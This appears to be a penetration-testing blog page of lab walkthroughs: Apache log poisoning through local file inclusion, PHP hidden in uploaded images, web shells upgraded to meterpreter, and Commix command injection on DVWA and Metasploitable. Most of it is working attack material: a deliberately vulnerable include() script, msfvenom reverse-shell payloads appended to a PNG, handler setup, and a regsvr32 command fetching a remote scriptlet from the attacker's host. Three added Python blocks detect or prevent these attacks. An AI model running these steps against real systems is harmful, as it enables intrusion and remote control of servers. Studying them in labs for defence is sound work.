Showing posts with label Penetration Testing.

Exploit Webserver through Log Injection with LFI

In this article you will see how to poison the Apache access.log file on the target machine through a local file inclusion vulnerability and gain unauthorized access with the help of that log file.

Attacker: Kali Linux
Target: Metasploitable 2

Connect to the target over the SSH service as shown in the following image.

Now log in as a user with sudo privileges and create a folder “lfi” inside /var/www:
cd /var/www
mkdir lfi


Now create a PHP file that includes whatever file is named in the file parameter. Because the parameter is passed to include() unchecked, it can be used to execute a file that contains malicious code and gain unauthorized access to the target PC.

<?php
// Deliberately vulnerable: the value of ?file= goes straight into include()
$file = $_GET['file'];
if(isset($file))
{
    include("$file");
}
else
{
    include("index.php");
}
?>
Now I have saved the above PHP code in a text file as lfi.php and shared this file.


To download lfi.php into the lfi directory, type the following command:


Now let’s browse to the following URL: 192.168.1.8/lfi/lfi.php
In the given screenshot you can see that when I browsed the lfi.php file, it showed an error that looks like a local file inclusion vulnerability.


Now I will try to open the Apache access.log file. To read it, I will first give read permission to apache2 and then include the access.log file.


Now include the access.log file as the file parameter and enter the following URL in the browser.
192.168.1.8/lfi/lfi.php?file=/var/www/apache2/access.log
Now turn on Burp Suite to capture the request for the same web page.


Here you get the intercepted request, where we need to inject our command inside the User-Agent header by replacing the highlighted data.



Add the command inside the User-Agent header and send the request with the GET parameter 192.168.1.8/lfi/lfi.php?file=/var/www/apache2/access.log&c=ps as shown in the image below. Then click Forward.


Here it dumps the log data and also executes the command given through cmd. In the screenshot you can see both the log and the process state.


In the same manner, execute lsb_release -a through cmd and view the result in the given screenshot.
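As an added defensive example (not part of the original article), the following Python scans Apache combined-format access log lines for the two halves of the technique above: a PHP open tag written into the User-Agent or Referer header, and a request whose parameter names a log file or traverses directories. The log lines are constructed samples modelled on this walkthrough, and the field layout assumes Apache's default `combined` LogFormat.

```python
import re
from urllib.parse import parse_qs, urlparse

# Apache "combined" format: host ident user [time] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# A PHP open tag in a header that gets written to the log is the poisoning step itself.
PHP_TAG = re.compile(r"<\?(php|=)", re.IGNORECASE)
# Parameter values naming a log file, or traversing out of the web root, are the
# second half: the include() request that pulls the poisoned log back in.
LOG_TARGET = re.compile(r"(access|error)\.log|/var/log/|/proc/self/environ", re.IGNORECASE)

def analyse_line(line):
    """Return a list of (reason, evidence) tuples for one log line; empty means nothing suspicious."""
    m = LOG_RE.match(line.strip())
    if not m:
        return [("unparsable", line.strip()[:60])]
    hits = []
    for field in ("ua", "referer"):
        if PHP_TAG.search(m.group(field)):
            hits.append(("php-tag-in-" + field, m.group(field)))
    parts = m.group("request").split(" ")
    if len(parts) >= 2:                      # "GET /path?query HTTP/1.1"
        # parse_qs percent-decodes, so %2F-encoded traversal is caught as well
        for name, values in parse_qs(urlparse(parts[1]).query).items():
            for value in values:
                if LOG_TARGET.search(value) or "../" in value:
                    hits.append(("include-of-log-or-traversal", "%s=%s" % (name, value)))
    return hits

def scan(lines):
    """Map line index -> findings for every line that produced at least one."""
    report = {}
    for index, line in enumerate(lines):
        hits = analyse_line(line)
        if hits:
            report[index] = hits
    return report

# Constructed sample lines mirroring the walkthrough above: a normal request, the
# poisoning request, the request that includes the log, and an encoded traversal.
SAMPLE_LOG = [
    '192.168.1.5 - - [10/Oct/2017:10:00:01 +0000] "GET /lfi/lfi.php?file=index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '192.168.1.7 - - [10/Oct/2017:10:00:02 +0000] "GET /lfi/lfi.php?file=/var/www/apache2/access.log HTTP/1.1" 200 9000 "-" "<?php echo \'poisoned\'; ?>"',
    '192.168.1.7 - - [10/Oct/2017:10:00:03 +0000] "GET /lfi/lfi.php?file=/var/www/apache2/access.log&c=ps HTTP/1.1" 200 9400 "-" "Mozilla/5.0"',
    '192.168.1.7 - - [10/Oct/2017:10:00:04 +0000] "GET /dvwa/vulnerabilities/fi/?page=..%2F..%2Fhackable%2Fuploads%2Fshell.png HTTP/1.1" 200 88 "-" "Mozilla/5.0"',
]
```

Run `scan(SAMPLE_LOG)` to get a dict keyed by the offending line numbers; on a real server feed it the lines of access.log instead.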

Web Server Exploitation with LFI and File Upload

In this article you will learn how to bypass the high-security file upload check in DVWA through the FILE INCLUSION vulnerability, and how to use local file inclusion to get a reverse connection from the victim’s PC.

Attacker: Kali Linux
Target: DVWA

First you need to download the Exif Pilot tool from here. This is a GUI tool for Windows users that allows adding EXIF data and metadata to JPEG, PNG and GIF images.


Now open Exif Pilot and insert any image to hide the malicious comment inside it; in the screenshot you can see I have chosen the shell.png image and then clicked EDIT EXIF/IPTC.


Then, inside the comment text field, type the malicious code and click OK.


Here the EXIF data has been edited successfully inside the image. The tool replaces the original image in the same folder with the malicious one and sends the original image to the Recycle Bin.


Now browse to the target IP and log in to DVWA with admin:password as the credentials. Set the security level to high.


Choose the File Upload vulnerability to upload the malicious image to the web application, browse to your malicious image shell.png and click Upload.


It will show the path of the uploaded image; copy the highlighted path.


Now open the copied path in the browser, where you will find the uploaded image.


In order to execute the malicious code we need to change the vulnerability category as well as the security level, so that we can execute the command hidden inside the image.
Now set the security level to low.

To bypass the high-security file upload check in DVWA we need to use another vulnerability, and I have selected File Inclusion for this purpose.

File Inclusion allows users to execute any file through the URL, as described above.


Now paste the copied path of the uploaded image into the URL as shown in the screenshot.

Here it gives the warning system(): cannot execute blank command, which means we need to add a command for execution; through the URL we will be able to execute any command.


Here I try to check the network configuration of the victim’s PC, and you can see the result in the screenshot.


Here you can view the directories I got by executing the dir command through the URL.


Next I will try to obtain a meterpreter session using Kali Linux.
Type msfconsole to load the Metasploit Framework.
use exploit/windows/misc/regsvr32_applocker_bypass_server
msf exploit(regsvr32_applocker_bypass_server) > set lhost 192.168.1.103
msf exploit(regsvr32_applocker_bypass_server) > set lport 1234
msf exploit(regsvr32_applocker_bypass_server) > exploit

regsvr32 /s /n /u /i:http://192.168.1.103:8080/7vnJTV4ONLKkU19.sct scrobj.dll
Copy the above malicious command and send it to the victim.


Here paste the above malicious regsvr32 command into the URL; when the code runs in the browser, the attacker gets the victim’s meterpreter session on his Kali Linux.
http://192.168.1.102/dvwa/vulnerabilities/fi/?page=../../hackable/uploads/shell.png&c=regsvr32 /s /n /u /i:http://192.168.1.103:8080/7vnJTV4ONLKkU19.sct scrobj.dll


Meterpreter session 1 will open.
meterpreter > sysinfo


Second Way

In the second part we will combine a malicious PHP file with an image, upload that malicious image to the web application server, and then execute it in the same manner as above.

First download any .png/.jpg/.gif image and save it on the Desktop. Inside Kali Linux I have downloaded an image and saved it with the name “a.png” on the desktop. Now open the terminal and type the following command to append PHP code to the “a.png” image.

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.103 lport=4444 >> /root/Desktop/a.png



Let’s verify whether the image contains the malicious code:
cat /root/Desktop/a.png

When you scroll down the terminal output, you will find that the end of the image contains PHP code. This means we have successfully created a malicious image that is ready to upload to the web application server.
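Both ways of hiding PHP in an image shown above (a tag in the EXIF comment, and msfvenom output appended after the image data) are caught by the same upload check. The following Python is an added example, not code from the article or from DVWA: it builds its own minimal PNG samples, so the image bytes are constructed and the helper names are mine.

```python
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
# Open tags PHP honours if the file is ever handed to include(); a genuine image has none.
PHP_MARKERS = (b"<?php", b"<?=", b"<script language=\"php\"")

def png_chunk(ctype, payload):
    crc = zlib.crc32(ctype + payload) & 0xFFFFFFFF   # CRC covers type + data
    return struct.pack(">I", len(payload)) + ctype + payload + struct.pack(">I", crc)

def make_png(text_chunks=()):
    """Build a valid 1x1 greyscale PNG, optionally with tEXt chunks (constructed sample)."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)
    idat = zlib.compress(b"\x00\x00")                # filter byte + one pixel
    body = png_chunk(b"IHDR", ihdr) + png_chunk(b"IDAT", idat)
    for key, value in text_chunks:
        body += png_chunk(b"tEXt", key + b"\x00" + value)
    return PNG_SIG + body + png_chunk(b"IEND", b"")

def png_trailing_data(data):
    """Walk the chunk list and return whatever follows IEND (empty for a clean file)."""
    if not data.startswith(PNG_SIG):
        raise ValueError("not a PNG")
    pos = len(PNG_SIG)
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        pos += 8 + length + 4                        # header + payload + CRC
        if ctype == b"IEND":
            return data[pos:]
    raise ValueError("truncated PNG: no IEND chunk")

def inspect_upload(data):
    """Return the reasons an upload should be rejected; an empty list means it passed."""
    findings = []
    trailing = png_trailing_data(data)
    if trailing:
        findings.append("%d bytes appended after IEND" % len(trailing))
    for marker in PHP_MARKERS:                       # also covers tEXt/eXIf chunk contents
        if marker in data:
            findings.append("PHP open tag %r inside image" % marker)
            break
    return findings

# Constructed samples: a clean image, one with a PHP comment in its metadata (the Exif
# editing step above) and one with PHP appended (the msfvenom >> a.png step above).
CLEAN = make_png()
COMMENTED = make_png([(b"Comment", b"<?php echo 'tagged'; ?>")])
APPENDED = CLEAN + b"<?php echo 'tagged'; ?>\n"
```

Rejecting the upload on any finding, and never letting the uploads directory be reachable through include(), closes both paths used in this article.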


Now repeat the above process to upload the file to DVWA with the security level set to high. In the given screenshot you can see my “a.png” image has been uploaded successfully to the web server.
Copy the highlighted path where the image is uploaded.


Before executing the image on the web server, start multi/handler in the background in Kali Linux:
msf > use multi/handler
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.103
msf exploit(handler) > set lport 4444
msf exploit(handler) > exploit


Again set the security level to low in DVWA, open the File Inclusion vulnerability and repeat the same process as above: paste the copied path of the uploaded image into the URL and execute it, which will provide a reverse connection to Kali Linux.

http://192.168.1.102/dvwa/vulnerabilities/fi/?page=../../hackable/uploads/a.png


meterpreter > sysinfo
I have got a meterpreter session of the victim PC.

Webshell to Meterpreter

In this article you will learn how to achieve a meterpreter shell after uploading a PHP backdoor script to the victim’s PC. You can read the previous article on uploading a PHP web shell to a web server.

Type msfconsole to load the Metasploit Framework.
Now type use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set target 1
msf exploit(web_delivery) > set payload windows/meterpreter/reverse_tcp
msf exploit(web_delivery) > set lhost 192.168.0.104
msf exploit(web_delivery) > set srvport 8081
msf exploit(web_delivery) > exploit


Copy the highlighted text shown in the window below.


Meterpreter shell using b374k

In the given screenshot you can see that we have successfully uploaded the b374k script; now paste the copied malicious code and execute it as a command.


When the above code executes you will get meterpreter session 1.
msf exploit(web_delivery) > sessions -i 1
meterpreter> sysinfo


Meterpreter shell using c99 shell

Repeat the same process: after uploading the c99 script to the web server, paste the PHP code we got through web delivery into the c99 shell and execute it as a command.


This will give you another meterpreter session.
meterpreter> sysinfo


Meterpreter shell using Weevely

Once you have uploaded the weevely backdoor to the web server, repeat the same process inside weevely as I have done: paste the malicious PHP code we got through web delivery and hit Enter.


Here one more meterpreter session will open.
meterpreter> sysinfo


Meterpreter shell using wso2.5.1.php

The next step is to get a meterpreter shell through the wso2.5.1.php script: again repeat the web delivery step to get the malicious PHP code, paste that code into this script and execute it as a command.


CONGRATS!!! We have successfully accessed a meterpreter shell through different PHP scripts. Here we have another meterpreter session.
meterpreter> sysinfo

Command Injection to Meterpreter using Commix


Commix is an automated command injection tool. It lets you get a meterpreter session via command injection if the web application is vulnerable to it. It is pretty efficient and reliable. Commix is widely used by security experts, penetration testers and also web developers to find vulnerabilities. In this article we will learn how to get a meterpreter session using Commix.
Requirements:
· DVWA (for Windows 10)
· PentesterLab (for Linux testing)
· Kali Linux
· Commix
As you can see in the image below, the DVWA environment is vulnerable to command injection. Submit the localhost request from DVWA.


Capture the previously submitted request in Burp Suite by turning on intercept as shown in the image below:


Once the cookies are captured, copy the whole cookie and paste it in a TXT file. Now use the following command to exploit the command injection vulnerability in the DVWA environment:

commix -r /root/Desktop/req.txt
Here,

-r refers to the path of the request file from which the HTTP request is loaded.
Once exploitation is successful, it asks whether you want to load the pseudo-terminal. Type ‘y’ and it will be loaded. Use the ‘whoami’ command to check the user as shown in the image:


Now that you are in the pseudo-terminal, type the following set of commands to generate a reverse shell:

reverse_tcp
set lhost 192.168.1107
set lport 1234

After executing the above commands, it asks whether you want a netcat shell or another (meterpreter) shell; press 2 for meterpreter. Then it asks which meterpreter payload you want, i.e. PHP, Windows, etc. As our DVWA is set up on Windows, we select option 10. Then it asks you to choose a particular PowerShell injection method. Choose 1 for now, as we will try the other options too.


When everything is done, it produces a resource file together with the command to execute it. Open a new terminal window and type the command there; in our case it generated the following command:
msfconsole -r /usr/share/commix/powershell_attack.rc


As the above command is executed, you will directly have your meterpreter session as shown in the image above.

Now repeat the above steps, but instead of choosing option 1 for PowerShell injection choose option 2 this time, which gets us a meterpreter session through Magic Unicorn. After choosing option 2, it again generates a resource file to be executed in a new terminal window. In our case the following command was generated:
msfconsole -r /usr/share/magic-unicorn/unicorn.rc


Again, when the command executes you will have your meterpreter session as shown in the image below:


All the above meterpreter sessions were taken using option 10 under the meterpreter reverse shell category. This time we will use option 11, web delivery, to get a meterpreter session. So repeat the same steps as above, but this time choose option 11 when asked which meterpreter reverse shell you want.


Once you have chosen option 11, it asks whether you want the web delivery script for PHP, Python or Windows. As we are attacking Windows, select option 3.


Once again it gives you a resource file and a command to run in a new terminal window. In our case the following command was generated:
msfconsole -r /usr/share/commix/web_delivery.rc
As the command is executed, you will have your meterpreter session as shown in the image below:


Until now, all the meterpreter sessions we took were in a Windows environment. Now we will gain a meterpreter session in a Linux environment. For this we will use PentesterLab.


Just like we did for Windows, capture the cookies of PentesterLab in Burp Suite as shown in the image below:


Copy the contents of the cookies into a TXT file and use the following command to attack:
commix -r /root/Desktop/1.txt
Once exploitation is successful, it asks whether you want to load the pseudo-terminal. Type ‘y’ and it will be loaded. Use the ‘whoami’ command to check the user as shown in the image:


Now that you are in the pseudo-terminal, type the following set of commands to generate a reverse shell:
reverse_tcp
set lhost 192.168.1107
set lport 1234
After executing the above commands, it asks whether you want a netcat shell or another (meterpreter) shell; press 2 for meterpreter. Then it asks which meterpreter payload you want, i.e. PHP, Windows, etc. As we are now testing on Linux, we select option 8, i.e. a PHP meterpreter reverse shell.


Just like before, this too generates a resource file that you have to execute in a new terminal window. In our case the command generated was:
msfconsole -r /usr/share/commix/php_meterpreter.rc
As the above command is executed, you will have your session as shown in the image below:


The other method we will use to exploit Linux is web delivery. Repeat the above steps, but instead of choosing option 8 this time choose option 11 for web delivery, and then choose option 2 for a PHP reverse shell.


Executing the above steps creates a resource file yet again. Run the given command in a new terminal window:
msfconsole -r /usr/share/commix/web_delivery.rc


Running the above command gives you your session as shown in the image above. This is how you can gain a meterpreter session through a command injection vulnerability using Commix. The session can be acquired on both Windows and Linux platforms.
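The command injection that Commix exploits here comes from splicing user input into a shell command, as DVWA's ping form does. The following Python is an added example, not from the article, Commix or DVWA: it shows the vulnerable string-building pattern beside a hardened version that allowlists the target and never invokes a shell; the function names are illustrative.

```python
import ipaddress
import re
import subprocess

# RFC 1123 hostname grammar: dot-separated labels of letters, digits and hyphens.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)([a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?\.)*[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?$",
    re.IGNORECASE,
)

def vulnerable_ping_command(target):
    """The pattern behind the injectable ping form: user input spliced into one shell string.
    With shell=True, anything after ';' or '&&' in `target` runs as a second command."""
    return "ping -c 1 " + target

def safe_ping_argv(target):
    """Validate the target against an allowlist, then return an argv list.
    Passing a list to subprocess.run (shell=False) means no shell ever parses the input."""
    target = target.strip()
    if not target:
        raise ValueError("empty target")
    try:
        ipaddress.ip_address(target)              # accepts IPv4/IPv6 literals only
    except ValueError:
        if not HOSTNAME_RE.match(target):
            raise ValueError("target is neither an IP address nor a hostname: %r" % target)
    return ["ping", "-c", "1", target]

def rejects(target):
    """True if safe_ping_argv refuses the input; this is what a unit test or WAF rule checks."""
    try:
        safe_ping_argv(target)
    except ValueError:
        return True
    return False

def run_ping(target, timeout=5):
    """Run the validated command without a shell; stdout is then safe to echo back to the page."""
    return subprocess.run(safe_ping_argv(target), capture_output=True, text=True, timeout=timeout)
```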